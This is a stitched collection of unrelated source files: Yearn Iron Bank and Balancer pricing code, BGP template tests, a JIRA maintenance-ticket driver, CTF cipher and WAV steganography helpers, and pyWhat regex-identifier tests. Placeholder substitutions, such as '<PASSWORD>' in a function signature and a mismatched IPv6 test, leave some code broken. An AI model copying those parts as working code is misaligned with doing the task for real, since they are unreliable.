ironbank = Contract("0xAB1c342C7bf5Ec5F02ADEA1c2270670bCa144CbB")
markets = [Contract(market) for market in ironbank.getAllMarkets()]
cdata = multicall_matrix(markets, ["symbol", "underlying", "decimals"])
underlying = [Contract(cdata[x]["underlying"]) for x in markets]
data = multicall_matrix(underlying, ["symbol", "decimals"])
self.vaults = [
IronbankMarket(
cdata[market]["symbol"],
market,
data[token]["symbol"],
token,
cdata[market]["decimals"],
data[token]["decimals"],
)
for market, token in zip(markets, underlying)
]
def __repr__(self):
return f"<IronBank markets={len(self.vaults)}>"
def describe(self, block=None):
markets = self.active_vaults_at(block)
blocks_per_year = 365 * 86400 / 15
contracts = [m.vault for m in markets]
results = multicall_matrix(
contracts,
[
"exchangeRateCurrent",
"getCash",
"totalBorrows",
"totalSupply",
"totalReserves",
"supplyRatePerBlock",
"borrowRatePerBlock",
],
block=block,
)
prices = Parallel(8, "threading")(
delayed(magic.get_price)(market.underlying, block=block) for market in markets
)
output = defaultdict(dict)
for m, price in zip(markets, prices):
res = results[m.vault]
exchange_rate = res["exchangeRateCurrent"] * 10 ** (m.cdecimals - m.decimals - 18)
for attr in ["getCash", "totalBorrows", "totalReserves"]:
res[attr] /= 10 ** m.decimals
tvl = (res["getCash"] + res["totalBorrows"] - res["totalReserves"]) * price
supplied = res["getCash"] + res["totalBorrows"] - res["totalReserves"]
ratio = res["totalBorrows"] / supplied if supplied != 0 else None
output[m.name] = {
"total supply": res["totalSupply"] / 10 ** m.cdecimals,
"total cash": res["getCash"],
"total supplied": supplied,
"total borrows": res["totalBorrows"],
"total reserves": res["totalReserves"],
"exchange rate": exchange_rate,
"token price": price * exchange_rate,
"underlying price": price,
"supply apy": res["supplyRatePerBlock"] / 1e18 * blocks_per_year,
"borrow apy": res["borrowRatePerBlock"] / 1e18 * blocks_per_year,
"utilization": ratio,
"tvl": tvl,
"address": m.vault,
"version": "ib",
}
return dict(output)
def total_value_at(self, block=None):
markets = self.active_vaults_at(block)
data = multicall_matrix(
[market.vault for market in markets],
["getCash", "totalBorrows", "totalReserves", "totalSupply"],
block=block,
)
prices = Parallel(8, "threading")(delayed(magic.get_price)(market.vault, block=block) for market in markets)
results = [data[market.vault] for market in markets]
return {
# market.name: (res["getCash"] + res["totalBorrows"] - res["totalReserves"]) / 10 ** market.decimals * price
market.name: res["totalSupply"] / 10 ** market.cdecimals * price
for market, price, res in zip(markets, prices, results)
}
def active_vaults_at(self, block=None):
if block is None:
return self.vaults
return [market for market in self.vaults if contract_creation_block(str(market.vault)) < block]
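# Note: describe() rescales exchangeRateCurrent by
# 10 ** (cToken decimals - underlying decimals - 18), matching the
# Compound-style cToken scaling, to obtain an underlying-per-cToken exchange rate.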
```
#### File: yearn/prices/balancer.py
```python
from brownie import Contract
from cachetools.func import ttl_cache
from yearn.cache import memory
from yearn.multicall2 import fetch_multicall
from yearn.prices import magic
@memory.cache()
def is_balancer_pool(address):
pool = Contract(address)
required = {"getCurrentTokens", "getBalance", "totalSupply"}
if set(pool.__dict__) & required == required:
return True
return False
@ttl_cache(ttl=600)
def get_price(token, block=None):
pool = Contract(token)
tokens, supply = fetch_multicall([pool, "getCurrentTokens"], [pool, "totalSupply"], block=block)
supply = supply / 1e18
balances = fetch_multicall(*[[pool, "getBalance", token] for token in tokens], block=block)
balances = [balance / 10 ** Contract(token).decimals() for balance, token in zip(balances, tokens)]
total = sum(balance * magic.get_price(token, block=block) for balance, token in zip(balances, tokens))
return total / supply
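# Rough worked illustration of the formula above (hypothetical numbers): a pool
# holding 10 WETH at $2,000 and 40,000 DAI at $1 with an LP totalSupply of 100
# prices one LP token at (10 * 2000 + 40000 * 1) / 100 = $600.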
``` |
{
"source": "0xmc/hackathon81_configmodel",
"score": 3
} |
#### File: templates/eos/test_bgppeer.py
```python
import unittest
from configmodel.templates.render import render
class TestBGPPeer(unittest.TestCase):
"""BGP peer unit tests."""
def test_pass_a(self):
"""Local AS only."""
config = {"local_asn": 666}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
"""
assert actual == expected
def test_pass_b(self):
"""Good ipv4 only."""
config = {"local_asn": "666", "peer_asn": "666", "peer_v4": "192.0.2.1"}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
neighbor 192.0.2.1 remote-as 666
"""
assert actual == expected
def test_pass_c(self):
"""Good ipv4 and ipv6."""
config = {
"local_asn": "666",
"peer_asn": "666",
"peer_v4": "192.0.2.1",
"peer_v6": "2001:db8:c057:e110::1",
}
actual = render("eos", "bgppeer", config)
expected = """router bgp 666
neighbor 192.0.2.1 remote-as 666
neighbor 2001:db8:c057:e110::1 remote-as 666
"""
assert actual == expected
```
#### File: templates/junos/test_bgppeer.py
```python
import unittest
from configmodel.templates.render import render
class TestBGPPeer(unittest.TestCase):
"""BGP peer unit tests."""
def test_pass_a_internal(self):
"""Internal AS only."""
config = {"local_asn": 666, "peer_asn": 666}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group internal-peers {
type internal;
}
}
"""
assert actual == expected
def test_pass_a_external(self):
"""External AS only."""
config = {"local_asn": 666, "peer_asn": 1337}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group external-peers {
type external;
peer-as 1337;
}
}
"""
assert actual == expected
def test_pass_b_internal_v4(self):
"""Internal and ipv4."""
config = {"local_asn": 666, "peer_asn": 666, "peer_v4": "192.0.2.1"}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group internal-peers {
type internal;
neighbor 192.0.2.1;
}
}
"""
assert actual == expected
def test_pass_c_internal_v4_v6(self):
"""Internal and ipv4 and ipv6."""
config = {
"local_asn": 666,
"peer_asn": 666,
"peer_v4": "192.0.2.1",
"peer_v6": "2001:db8:c057:e110::1",
}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group internal-peers {
type internal;
neighbor 192.0.2.1;
neighbor 2001:db8:c057:e110::1;
}
}
"""
assert actual == expected
def test_pass_d_external_v4_v6(self):
"""External and ipv4 and ipv6."""
config = {
"local_asn": 666,
"peer_asn": 1337,
"peer_v4": "192.0.2.1",
"peer_v6": "2001:db8:c057:e110::1",
}
actual = render("junos", "bgppeer", config)
expected = """autonomous-system 666;
bgp {
group external-peers {
type external;
peer-as 1337;
neighbor 192.0.2.1;
neighbor 2001:db8:c057:e110::1;
}
}
"""
assert actual == expected
``` |
{
"source": "0xmc/maint-notification",
"score": 3
} |
#### File: maint-notification/xmaintnote/ticketing.py
```python
from textwrap import dedent
from jira import JIRA
class Ticket(object):
"""Base class for a ticket
    Its purpose is to provide standard methods for retrieving duplicates,
    creating events, and deleting them.
Implementation details should be self-contained to each subclass but not
really different from the interface perspective.
Attributes:
event (XMaintNoteEvent)
        account (str)
impact (str)
maintenance_id (str)
object_id (str)
provider (str)
        key (str): String intended to be unique among maintenances
title (str): Generated title that may be used as a ticket title
        body (str): Generated body that may be used as a ticket description
        ticket: Optionally set by the subclass; instance of the ticket in the
            ticketing system
"""
def __init__(self, event, **kwargs):
"""Initializes and runs _post_init()
        Event is the only required input; any kwargs are accepted and
        forwarded to ``self._post_init``. The purpose of the ``_post_init`` method
        is to let each type of ticketing system mutate the event data
        however it needs without overloading ``__init__`` itself.
A key is created using the provider, account, and maintenance-id keys
of the event. How this is implemented by a ticketing system to take
advantage of is up to the subclass.
Args:
event (XMaintNoteEvent): Maintenance Event
"""
self.event = event
self.account = event['X-MAINTNOTE-ACCOUNT']
self.impact = event['X-MAINTNOTE-IMPACT']
self.maintenance_id = event['X-MAINTNOTE-MAINTENANCE-ID']
self.object_id = event['X-MAINTNOTE-OBJECT-ID']
self.provider = event['X-MAINTNOTE-PROVIDER']
self.ticket = None
factors = [
self.provider,
self.account,
self.maintenance_id,
]
self.key = '{}:{}:{}'.format(*factors)
self.title = '{provider} {impact} Maintenance for {account}'.format(
provider=self.provider,
impact=self.impact,
account=self.account,
)
body = '''
        {provider} has scheduled a maintenance with impact {impact}. The affected
        account number is {account}.
Start time: {start_time}
End time: {end_time}
Impact: {impact}
Account: {account}
'''.format(
provider=self.provider,
impact=self.impact,
account=self.account,
start_time=str(event['DTSTART'].dt),
end_time=str(event['DTEND'].dt),
)
self.body = dedent(body)
self._post_init(**kwargs)
def _post_init(self, **kwargs):
pass
def create(self):
"""Overload to create a ticket in the system"""
        raise NotImplementedError('Subclass must overload this method')
def close(self):
"""Overload to close a ticket in the system"""
        raise NotImplementedError('Subclass must overload this method')
def exists(self):
"""Overload to determine if this event exists in ticket form already"""
        raise NotImplementedError('Subclass must overload this method')
class JiraTicket(Ticket):
"""Ticket driver for JIRA
Supports adding list of watchers to maintenance issues created, custom
finishing transition for when calling close, and custom issue types.
Priorities will be mapped according to the impact status of the
maintenance. A preferred mapping can be provided otherwise it defaults to
using the Vanilla JIRA install names, eg:
>>> {
'NO-IMPACT': {'name': 'Low'},
'REDUCED-REDUNDANCY': {'name': 'Medium'},
'DEGRADED': {'name': 'High'},
'OUTAGE': {'name': 'Highest'},
}
Example:
>>> type(event)
xmaintnote.event.XMaintNoteEvent
>>> tkt = JiraTicket(
event,
url='http://localhost',
username='admin',
password='<PASSWORD>',
watchers='noc',
)
>>> tkt.exists()
False
>>> tkt.create()
True
>>> tkt.exists()
True
>>> tkt.ticket
<JIRA Issue: key=u'MAINT-14', id=u'10013'>
>>> tkt.impact
vText('NO-IMPACT')
>>> tkt.ticket.fields.priority
<JIRA Priority: name=u'Low', id=u'4'>
>>> tkt.ticket.fields.labels
[u'example.com:137.035999173:WorkOrder-31415']
"""
def _post_init(
self,
url='http://localhost:8080',
username=None,
password=<PASSWORD>,
project='MAINT',
issuetype='Task',
finished_transition='Done',
watchers=None,
pri_mapping=None,
):
"""Setup to initialize Jira client and any required settings
If username or password aren't provided, will attempt to do actions as
anonymous
Args:
url (str): URL to jira server. MUST have the URL scheme (http://)
username (str): Username (if applicable)
password (str): Password (if applicable)
project (str): JIRA project handle
issuetype (str): Issue type to file these issues as
watchers (list): List of usernames to add as watchers to the maints
finished_transition (str): Transition to move the issue into when
calling the ``.close`` method. Default: Done
pri_mapping (str): Map of maintenance impact name to JIRA priority
dict. eg, {'NO-IMPACT': {'name': 'Low'}}
"""
# If either part of the credential tuple is unprovided, default to
# anonymous
credentials = (username, password)
if not all(credentials):
basic_auth = None
else:
basic_auth = credentials
if not watchers:
watchers = []
if not pri_mapping:
pri_mapping = {
'NO-IMPACT': {'name': 'Low'},
'REDUCED-REDUNDANCY': {'name': 'Medium'},
'DEGRADED': {'name': 'High'},
'OUTAGE': {'name': 'Highest'},
}
self.jira = JIRA(url, basic_auth=basic_auth)
self.project = project
self.issuetype = issuetype
self.finished_transition = finished_transition
self.watchers = watchers
self.pri_mapping = pri_mapping
def exists(self):
"""Return bool for whether maintenance issue exists for this event
Improvements: Currently not handling the case where multiple issues are
returned which may hint that the key used isn't unique enough or people
        have manually added the same label to other things. Also no exception
        handling, mostly because the exceptions returned by JIRA are pretty
        descriptive.
Returns:
exists (bool)
"""
existing = self.jira.search_issues('labels = {}'.format(self.key))
if existing:
self.ticket = existing[0]
return True if existing else False
def create(self):
"""Create issue for event
        Pre-checks run first, such as whether this is a duplicate. If so, stop
further actions.
Returns:
success (bool)
"""
jira = self.jira
# If issue doesn't exist, create it. Else return False for inability
# Add watchers to the new ticket
if not self.exists():
options = {
'project': self.project,
'summary': self.title,
'labels': [self.key],
'description': self.body,
'issuetype': {'name': self.issuetype},
'priority': self.pri_mapping[self.impact],
}
new_issue = jira.create_issue(fields=options)
self.ticket = new_issue
[self._add_watcher(new_issue, w) for w in self.watchers]
return True
else:
return False
def close(self):
"""Return bool representing success or failure for closing issue
If issue doesn't exist, will return False because it can't close.
Returns:
success (bool)
"""
jira = self.jira
finished_transition = self.finished_transition
if self.exists():
# Fetch the transitions that we can put the current issue into.
# Search through these for the provided ``finished_transition``
# from init. If not found, raise error.
tkt = self.ticket
transitions = jira.transitions(tkt)
transition_ids = [
t['id'] for t in transitions
if t['name'] == self.finished_transition
]
if not transition_ids:
raise ValueError(
'Transition "{}" not found'.format(finished_transition)
)
t = transition_ids[0]
jira.transition_issue(tkt, t)
else:
return False
def _add_watcher(self, issue, watcher):
"""Add watcher to issue"""
self.jira.add_watcher(issue, watcher)
```
#### File: maint-notification/xmaintnote/util.py
```python
import json
import icalendar
def encode_vDDDTypes(obj):
"""Convert vDDDTypes - date/time types to strings."""
if isinstance(obj, icalendar.prop.vDDDTypes):
return obj.to_ical()
raise TypeError(repr(obj) + " is not JSON serializable")
def ical2json(cal):
data = {cal.name: dict(cal.items())}
for component in cal.subcomponents:
if component.name not in data[cal.name]:
data[cal.name][component.name] = []
comp_obj = {}
for item in component.items():
comp_obj[item[0]] = item[1]
data[cal.name][component.name].append(comp_obj)
return json.dumps(data, default=encode_vDDDTypes, sort_keys=True, indent=4)
def display(cal):
return cal.to_ical().decode().replace('\r\n', '\n').strip()
def register_property(property_type):
property_name = property_type.property_name
icalendar.cal.types_factory[property_name] = property_type
icalendar.cal.types_factory.types_map[property_name] = property_name
return property_type
``` |
{
"source": "0xmmalik/CTF-Suite",
"score": 4
} |
#### File: CTF-Suite/crypto/a1z26.py
```python
ALPHA = "abcdefghijklmnopqrstuvwxyz"
def encode(plaintext, delimiter='-'):
"""for alpha characters only"""
ciphertext = ""
plaintext = plaintext.lower()
for i in range(len(plaintext)):
ciphertext += str(ALPHA.index(plaintext[i]) + 1) + delimiter
ciphertext = ciphertext[:-1]
return ciphertext
def decode(ciphertext, delimiter):
"""for alpha characters only"""
plaintext = ""
ciphertext = ciphertext.split(delimiter)
for num in ciphertext:
plaintext += ALPHA[int(num) - 1]
return plaintext
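# Example usage (illustrative):
# >>> encode("hello")
# '8-5-12-12-15'
# >>> decode("8-5-12-12-15", "-")
# 'hello'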
```
#### File: CTF-Suite/foren/audsteg.py
```python
import wave
def get_lsb(filepath):
wv = wave.open(filepath, mode="rb")
wv_bytes = bytearray(list(wv.readframes(wv.getnframes())))
wv.close()
wv_lsb = [wv_bytes[i] & 1 for i in range(len(wv_bytes))]
extracted_bin = ''.join([str(x) for x in wv_lsb])
return ''.join(chr(int(extracted_bin[i:i + 8], 2)) for i in range(0, len(extracted_bin), 8))
def enc_lsb(filepath, message, outputfile):
wv = wave.open(filepath, mode="rb")
wv_bytes = bytearray(list(wv.readframes(wv.getnframes())))
bits = list(map(int, ''.join([bin(ord(i)).lstrip('0b').rjust(8, '0') for i in message])))
for i, bit in enumerate(bits):
wv_bytes[i] = (wv_bytes[i] & 254) | bit
wv_mod = bytes(wv_bytes)
with wave.open(outputfile, "wb") as new_wv:
new_wv.setparams(wv.getparams())
new_wv.writeframes(wv_mod)
wv.close()
return 0
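# Hypothetical usage sketch (file names are placeholders; the cover WAV must be
# long enough to hold 8 samples per message character):
# >>> enc_lsb("cover.wav", "hi there", "stego.wav")
# 0
# >>> get_lsb("stego.wav")[:8]  # the decoded LSB stream starts with the message
# 'hi there'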
``` |
{
"source": "0xmostafam/pyWhat",
"score": 3
} |
#### File: pyWhat/pywhat/filter.py
```python
from collections.abc import Mapping
from typing import Optional
from pywhat.helper import AvailableTags, CaseInsensitiveSet, InvalidTag, load_regexes
class Filter(Mapping):
"""
A filter is an object containing the filtration information.
The difference from Distribution object is
that Filter object does not store regexes.
Example filters:
* {"Tags": ["Networking"]}
* {"Tags": ["Identifiers"], "ExcludeTags": ["Credentials"], "MinRarity": 0.6}
"""
def __init__(self, filters_dict: Optional[Mapping] = None):
tags = CaseInsensitiveSet(AvailableTags().get_tags())
self._dict = dict()
if filters_dict is None:
filters_dict = {}
self._dict["Tags"] = CaseInsensitiveSet(filters_dict.setdefault("Tags", tags))
self._dict["ExcludeTags"] = CaseInsensitiveSet(
filters_dict.setdefault("ExcludeTags", set())
)
        # We have regexes with 0 rarity which trip false-positive alarms all the time
self._dict["MinRarity"] = filters_dict.setdefault("MinRarity", 0.1)
self._dict["MaxRarity"] = filters_dict.setdefault("MaxRarity", 1)
if not self._dict["Tags"].issubset(tags) or not self._dict[
"ExcludeTags"
].issubset(tags):
raise InvalidTag("Passed filter contains tags that are not used by 'what'")
def get_filter(self):
return dict(self._dict)
def __repr__(self):
return f"{self.__class__.__name__}({self._dict})"
def __and__(self, other):
if type(self) != type(other):
return NotImplemented
tags = self._dict["Tags"] & other._dict["Tags"]
exclude_tags = self._dict["ExcludeTags"] & other._dict["ExcludeTags"]
min_rarity = max(self._dict["MinRarity"], other._dict["MinRarity"])
max_rarity = min(self._dict["MaxRarity"], other._dict["MaxRarity"])
return self.__class__(
{
"Tags": tags,
"ExcludeTags": exclude_tags,
"MinRarity": min_rarity,
"MaxRarity": max_rarity,
}
)
def __or__(self, other):
if type(self) != type(other):
return NotImplemented
tags = self._dict["Tags"] | other._dict["Tags"]
exclude_tags = self._dict["ExcludeTags"] | other._dict["ExcludeTags"]
min_rarity = min(self._dict["MinRarity"], other._dict["MinRarity"])
max_rarity = max(self._dict["MaxRarity"], other._dict["MaxRarity"])
return self.__class__(
{
"Tags": tags,
"ExcludeTags": exclude_tags,
"MinRarity": min_rarity,
"MaxRarity": max_rarity,
}
)
def __iand__(self, other):
if type(self) != type(other):
return NotImplemented
return self & other
def __ior__(self, other):
if type(self) != type(other):
return NotImplemented
return self | other
def __getitem__(self, key):
return self._dict[key]
def __iter__(self):
return iter(self._dict)
def __len__(self):
return len(self._dict)
def __contains__(self, item):
try:
return (
self["MinRarity"] <= item["Rarity"] <= self["MaxRarity"]
and set(item["Tags"]) & self["Tags"]
and not set(item["Tags"]) & self["ExcludeTags"]
)
except:
return False
def setdefault(self, key, default=None):
return self._dict.setdefault(key, default)
class Distribution(Filter):
"""
    A distribution is an object containing the regexes,
    but the regexes have gone through a filtering process.
Example filters:
* {"Tags": ["Networking"]}
* {"Tags": ["Identifiers"], "ExcludeTags": ["Credentials"], "MinRarity": 0.6}
"""
def __init__(self, filter: Optional[Filter] = None):
super().__init__(filter)
self._filter()
def _filter(self):
self._regexes = load_regexes()
temp_regexes = [regex for regex in self._regexes if regex in self]
self._regexes = temp_regexes
def get_regexes(self):
return list(self._regexes)
```
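The docstring's example filters can be combined with the `&`/`|` operators defined above. A small illustrative sketch, assuming pyWhat is installed:
```python
from pywhat.filter import Distribution, Filter

# Identifiers only, excluding credential-tagged regexes and low-rarity patterns.
f1 = Filter({"Tags": ["Identifiers"], "ExcludeTags": ["Credentials"], "MinRarity": 0.6})
f2 = Filter({"Tags": ["Networking"]})

# Intersection keeps the common tags and the stricter rarity bounds.
combined = f1 & f2
print(combined["MinRarity"])  # 0.6

# A Distribution applies the filter to the regex database at construction time.
dist = Distribution(f1)
print(len(dist.get_regexes()))
```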
#### File: pyWhat/tests/test_regex_identifier.py
```python
import re
import pytest
from pywhat import regex_identifier
from pywhat.filter import Filter
from pywhat.helper import load_regexes
database = load_regexes()
r = regex_identifier.RegexIdentifier()
def _assert_match_first_item(name, res):
assert name in res[0]["Regex Pattern"]["Name"]
def _assert_match_exploit_first_item(search, res):
assert search in res[0]["Regex Pattern"]["Exploit"]
def test_regex_successfully_parses():
assert "Name" in r.distribution.get_regexes()[0]
def _assert_match_in_items(name, res):
assert any(name in i["Regex Pattern"]["Name"] for i in res)
@pytest.mark.skip(
reason="Not all regex have tests now, check https://github.com/bee-san/pyWhat/pull/146#issuecomment-927087231 for info."
)
def test_if_all_tests_exist():
with open("tests/test_regex_identifier.py", "r", encoding="utf-8") as file:
tests = file.read()
for regex in database:
assert (
regex["Name"] in tests
), "No test for this regex found in 'test_regex_identifier.py'. Note that a test needs to assert the whole name."
def test_regex_format():
for regex in database:
assert re.findall(
r"^(?:\(\?i\))?\^\(.*\)\$$", regex["Regex"]
), r"Please use ^(regex)$ regex format. If there is '\n' character, you have to escape it. If there is '(?i)', it is allowed and should be before the '^'."
assert (
re.findall(r"\^\||\|\^|\$\|\^|\$\||\|\$", regex["Regex"]) == []
), "Remove in-between boundaries. For example, '^|$' should only be '|'."
def test_sorted_by_rarity():
rarity_num = [regex["Rarity"] for regex in database]
assert rarity_num == sorted(
rarity_num, reverse=True
), "Regexes should be sorted by rarity in 'regex.json'. Regexes with rarity '1' are at the top of the file and '0' is at the bottom."
def test_dogecoin():
res = r.check(["DANHz6EQVoWyZ9rER56DwTXHWUxfkv9k2o"])
_assert_match_first_item("Dogecoin (DOGE) Wallet Address", res)
def test_url():
res = r.check(["tryhackme.com"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_url_2():
res = r.check(["http://username:[email protected]/"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_invalid_tld():
res = r.check(["tryhackme.comm"])
assert "Uniform Resource Locator (URL)" not in res
def test_https():
res = r.check(["hTTPs://tryhackme.com"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_lat_long():
res = r.check(["52.6169586, -1.9779857"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long2():
res = r.check(["53.76297,-1.9388732"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long3():
res = r.check(["77\u00B0 30' 29.9988\" N"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long4():
# degree symbol has to be a unicode character, otherwise Windows will not understand it
res = r.check(["N 32\u00B0 53.733 W 096\u00B0 48.358"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long5():
res = r.check(["41\u00B024'12.2\" N 2\u00B010'26.5\" E"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_lat_long6():
res = r.check(["40.741895,-73.989308"])
_assert_match_first_item("Latitude & Longitude Coordinates", res)
def test_ip():
res = r.check(
["http://10.1.1.1/just/a/test"],
boundaryless=Filter({"Tags": ["Identifiers"]}),
)
_assert_match_first_item("Uniform Resource Locator (URL)", res)
assert "Internet Protocol (IP) Address Version 4" in res[1]["Regex Pattern"]["Name"]
def test_ip_not_url():
res = r.check(["http://10.1.1.1"])
assert "Uniform Resource Locator (URL)" not in res[0]
def test_ip2():
res = r.check(["192.0.2.235:80"])
assert "192.0.2.235:80" in res[0]["Matched"]
def test_ip3():
res = r.check(["2001:0db8:85a3:0000:0000:8a2e:0370:7334"])
_assert_match_first_item("Internet Protocol (IP) Address Version 6", res)
def test_ip4():
res = r.check(["[20fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b]:8080"])
assert "[2001:dbfdf8:f53e:61e4::18]:8080" in res[0]["Matched"]
def test_mac():
res = r.check(["00:00:00:00:00:00"])
assert (
res
and "00:00:00:00:00:00" in res[0]["Matched"]
and res[0]["Regex Pattern"]["Name"]
== "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
and "Xerox Corp" in res[0]["Regex Pattern"]["Description"]
)
def test_mac2():
res = r.check(["00-00-00-00-00-00"])
assert (
res
and "00-00-00-00-00-00" in res[0]["Matched"]
and res[0]["Regex Pattern"]["Name"]
== "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
and "Xerox Corp" in res[0]["Regex Pattern"]["Description"]
)
def test_mac3():
res = r.check(["0000.0000.0000"])
assert (
res
and "0000.0000.0000" in res[0]["Matched"]
and res[0]["Regex Pattern"]["Name"]
== "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
and "Xerox Corp" in res[0]["Regex Pattern"]["Description"]
)
def test_mac4():
res = r.check(["00-00-00-00.00-00"])
assert (
not res
or res[0]["Regex Pattern"]["Name"]
!= "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
)
def test_mac5():
res = r.check(["00:00-00-00-00-00"])
assert (
not res
or res[0]["Regex Pattern"]["Name"]
!= "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
)
def test_mac6():
res = r.check(["00:00:0G:00:00:00"])
assert (
not res
or res[0]["Regex Pattern"]["Name"]
!= "EUI-48 Identifier (Ethernet, WiFi, Bluetooth, etc)"
)
@pytest.mark.skip(
reason="Fails because not a valid TLD. If presented in punycode, it works."
)
def test_international_url():
res = r.check(["http://папироска.рф"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_same_international_url_in_punycode():
res = r.check(["https://xn--80aaxitdbjk.xn--p1ai/"])
_assert_match_first_item("Uniform Resource Locator (URL)", res)
def test_ctf_flag():
res = r.check(["thm{hello}"])
_assert_match_first_item("TryHackMe Flag Format", res)
def test_ctf_flag_uppercase():
res = r.check(["FLAG{hello}"])
_assert_match_first_item("Capture The Flag (CTF) Flag", res)
def test_htb_flag():
res = r.check(["htb{just_a_test}"])
_assert_match_first_item("HackTheBox Flag Format", res)
def test_ethereum():
res = r.check(["0x52908400098527886E0F7030069857D2E4169EE7"])
_assert_match_first_item("Ethereum (ETH) Wallet Address", res)
def test_bitcoin_p2pkh():
res = r.check(["1KFHE7w8BhaENAswwryaoccDb6qcT6DbYY"])
_assert_match_first_item("Bitcoin (₿) Wallet Address", res)
def test_bitcoin_p2sh():
res = r.check(["3EmUH8Uh9EXE7axgyAeBsCc2vdUdKkDqWK"])
_assert_match_first_item("Bitcoin (₿) Wallet Address", res)
def test_bitcoin_bech32():
res = r.check(["bc1qj89046x7zv6pm4n00qgqp505nvljnfp6xfznyw"])
_assert_match_first_item("Bitcoin (₿) Wallet Address", res)
def test_monero():
res = r.check(
[
"<KEY>"
]
)
_assert_match_first_item("Monero (XMR) Wallet Address", res)
def test_litecoin():
res = r.check(["LRX8rSPVjifTxoLeoJtLf2JYdJFTQFcE7m"])
_assert_match_first_item("Litecoin (LTC) Wallet Address", res)
def test_visual_studio_token():
res = r.check(["<KEY>"])
_assert_match_in_items("Visual Studio App Center API Token", res)
def test_npm_token():
res = r.check(["<KEY>"])
_assert_match_first_item("Node Package Manager (NPM) Token", res)
def test_bitly_secret_key():
res = r.check(["<KEY>"])
_assert_match_in_items("Bitly Secret Key", res)
def test_bitcoincash():
res = r.check(["bitcoincash:qzlg6uvceehgzgtz6phmvy8gtdqyt6vf359at4n3lq"])
_assert_match_first_item("Bitcoin Cash (BCH) Wallet Address", res)
def test_ripple():
res = r.check(["rBPAQmwMrt7FDDPNyjwFgwSqbWZPf6SLkk"])
_assert_match_first_item("Ripple (XRP) Wallet Address", res)
def test_visa():
res = r.check(["4111111111111111"])
_assert_match_first_item("Visa Card Number", res)
def test_visa_spaces():
res = r.check(["4607 0000 0000 0009"])
_assert_match_first_item("Visa Card Number", res)
def test_master_Card():
res = r.check(["5409010000000004"])
_assert_match_first_item("MasterCard Number", res)
assert "UNION NATIONAL BANK" in res[0]["Regex Pattern"]["Description"]
def test_master_card_spaces():
res = r.check(["5409 0100 0000 0004"])
_assert_match_first_item("MasterCard Number", res)
assert "UNION NATIONAL BANK" in res[0]["Regex Pattern"]["Description"]
def test_american_express():
res = r.check(["340000000000009"])
_assert_match_first_item("American Express Card Number", res)
def test_american_express_spaces():
res = r.check(["3714 4963 5398 431"])
_assert_match_first_item("American Express Card Number", res)
def test_american_diners_club():
res = r.check(["30000000000004"])
assert "Diners Club Card Number" in res[1]["Regex Pattern"]["Name"]
def test_american_diners_club_spaces():
res = r.check(["3056 9309 0259 04"])
_assert_match_first_item("Diners Club Card Number", res)
def test_discover_card():
res = r.check(["6011000000000004"])
_assert_match_first_item("Discover Card Number", res)
def test_discover_card_spaces():
res = r.check(["6011 1111 1111 1117"])
_assert_match_first_item("Discover Card Number", res)
def test_maestro_card():
res = r.check(["5038146401278870"])
_assert_match_first_item("Maestro Card Number", res)
def test_maestro_card_spaces():
res = r.check(["6759 6498 2643 8453"])
_assert_match_first_item("Maestro Card Number", res)
@pytest.mark.skip("Key:Value Pair is not ran by default because of low rarity.")
def test_username():
res = r.check(["james:S3cr37_P@$$W0rd"])
_assert_match_first_item("Key:Value Pair", res)
def test_email():
res = r.check(["<EMAIL>"])
_assert_match_first_item("Email Address", res)
def test_email2():
res = r.check(["<EMAIL>"])
_assert_match_first_item("Email Address", res)
def test_email3():
res = r.check(
["john.smith@[123.123.123.123]"],
boundaryless=Filter({"Tags": ["Identifiers"]}),
)
assert "Email Address" in res[2]["Regex Pattern"]["Name"]
def test_email4():
res = r.check(["<EMAIL>"])
assert "Email Address" not in res
def test_phone_number():
res = r.check(["202-555-0178"])
_assert_match_first_item("Phone Number", res)
def test_phone_number2():
res = r.check(["+1-202-555-0156"])
_assert_match_first_item("Phone Number", res)
assert "United States" in res[0]["Regex Pattern"]["Description"]
def test_phone_number3():
res = r.check(["+662025550156"])
_assert_match_first_item("Phone Number", res)
assert "Thailand" in res[0]["Regex Pattern"]["Description"]
def test_phone_number4():
res = r.check(["+356 202 555 0156"])
_assert_match_first_item("Phone Number", res)
assert "Malta" in res[0]["Regex Pattern"]["Description"]
def test_youtube():
res = r.check(["https://www.youtube.com/watch?v=ScOAntcCa78"])
_assert_match_first_item("YouTube Video", res)
def test_youtube2():
res = r.check(["http://www.youtube.com/watch?v=dQw4w9WgXcQ"])
_assert_match_first_item("YouTube Video", res)
def test_youtube_id():
res = r.check(["dQw4w9WgXcQ"])
_assert_match_first_item("YouTube Video ID", res)
def test_youtube_id2():
res = r.check(["078-05-1120"])
assert "YouTube Video ID" not in res
def test_youtube_channel_id():
res = r.check(["UCjXfkj5iapKHJrhYfAF9ZGg"])
_assert_match_first_item("YouTube Channel ID", res)
def test_ssn():
res = r.check(["001-01-0001"])
_assert_match_first_item("American Social Security Number", res)
def test_ssn2():
res = r.check(["001:01:0001"])
_assert_match_first_item("American Social Security Number", res)
def test_ssn3():
res = r.check(["001.01.0001"])
_assert_match_first_item("American Social Security Number", res)
def test_ssn4():
res = r.check(["001 01 0001"])
_assert_match_first_item("American Social Security Number", res)
def test_ssn5():
res = r.check(["900-01-2222"])
assert "American Social Security Number" not in str(res)
def test_ssn6():
res = r.check(["999-21-2222"])
